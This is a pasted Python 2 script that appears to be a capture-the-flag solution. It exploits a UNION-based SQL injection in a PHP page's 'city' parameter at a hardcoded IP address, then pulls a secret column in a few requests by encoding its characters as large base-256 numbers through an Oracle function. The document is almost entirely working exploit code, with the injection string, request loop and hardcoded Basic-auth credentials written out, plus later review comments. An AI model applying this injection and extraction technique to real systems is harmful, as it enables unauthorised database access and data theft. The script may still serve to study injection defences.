
Untitled

a guest Jan 27th, 2014 359 Never
  1. #!/usr/bin/python
  2. #
  3. # Though the exploited function has to return ONLY a numeric value,
  4. # we can still reduce the number of SQL requests needed to extract the flag value
  5. # due to Oracle's ability to operate with quite BIG numbers.
  6. #
  7. # Below is how to obtain the flag with just THREE requests:
  8. # ONE to extract the flag's length and TWO to extract the flag itself
  9. #
  10.  
  11. from urllib2 import urlopen, Request
  12. import re
  13. import base64
  14.  
# Characters packed into one numeric value per request (chunk size used by numerize()).
# NOTE(review): presumably chosen so that 256**16 stays within the numeric range the
# called function can return -- not verified here.
MAX_LEN = 16
# HTTP Basic credentials; base64-encoded further down and sent on every request.
# The url below is plain http, so the Authorization header travels unencrypted.
username = 'admin'
password = 'P@ssw0rd9823_#@!hhqqyi'
  18.  
def numerize(name, length):
    """Build one SQL expression per chunk of ``name`` that packs the chunk into a number.

    The column ``name`` (``length`` characters long) is split into chunks of at
    most MAX_LEN characters.  For each chunk the expression sums
    ``ascii(substr(name, pos, 1)) * power(256, exp)`` over the chunk's
    characters, with ``exp`` counting down to 0 for the chunk's last character,
    so the whole chunk is represented by a single base-256 integer.  Terms are
    joined with '%2b' (the URL-encoded '+').

    Returns a list of expression strings, one per chunk; empty when ``length``
    is 0 or negative.
    """
    expressions = []
    for start in range(0, length, MAX_LEN):
        # Last chunk may be shorter than MAX_LEN.
        size = min(MAX_LEN, length - start)
        terms = []
        for offset in range(size):
            position = start + offset + 1  # substr() positions are 1-based
            exponent = size - offset - 1
            terms.append(
                'ascii(substr(' + name + ',' + str(position) + ',1))'
                + '*power(256,' + str(exponent) + ')'
            )
        expressions.append('%2b'.join(terms))
    return expressions
  36.  
  37.  
# Injection point: the SQL expression is carried in the 'city' query parameter.
url = 'http://195.133.87.173/address_shops.php?city='
# Request template: '$PAYLOAD$' is replaced with the expression to evaluate.
# The '+' characters here are URL-encoded spaces; a literal '+' inside a
# payload is written as '%2b' (see numerize()).
v = "flag''+union+select+to_char(PHD_IV_OWNER2.shop_private_pkg.get_product_quantity(''''''union+select+$PAYLOAD$+from+secret_products+where+hidden_code+is+not+null--''))+from+dual--"
# HTTP Basic credential value: base64("username:password").
creds = base64.b64encode('%s:%s' % (username, password))
# The numeric result is read back from a <tr>...</tr> cell in the HTML response.
# NOTE(review): '\d' in a non-raw string is an invalid escape sequence that
# Python 3.6+ warns about; r'<tr>(\d+)</tr>' is the portable spelling.
pat = re.compile('<tr>(\d+)</tr>')
column_name = 'hidden_code'

# Request 1: the column's length, needed to size the chunks numerize() builds.
payload = 'length(%s)' % column_name

# Python 2 print statement; the trailing comma suppresses the newline.
print 'Extracting flag length: ',
request = Request(url + v.replace('$PAYLOAD$',payload))
request.add_header("Authorization", "Basic %s" % creds)
resp = urlopen(request).read()

# No match check: if the pattern is absent, re.search() returns None and
# .groups() raises AttributeError.
l = int(re.search(pat, resp).groups()[0])
print l

# One expression per chunk of up to MAX_LEN characters.
payloads = numerize(column_name, l)

# Requests 2..N: each response carries one base-256 integer holding a chunk's bytes.
print 'Extracting flag: ',
flag = ''
for payload in payloads:
        request = Request(url + v.replace('$PAYLOAD$',payload))
        request.add_header("Authorization", "Basic %s" % creds)
        resp = urlopen(request).read()
        # int -> hex digits without the '0x' prefix.  Python 2 hex() of a long
        # ends in 'L', which the next line strips.
        f = str(hex(int(re.search(pat, resp).groups()[0])))[2:]
        if f.endswith('L'): f = f[:-1]
        # Python 2 str.decode('hex') turns the digits back into raw bytes
        # (binascii.unhexlify on Python 3).
        # NOTE(review): hex() drops a leading zero, so a chunk whose first byte is
        # below 0x10 would yield an odd-length string and fail here; fine for
        # printable text.
        flag +=  f.decode('hex')
print flag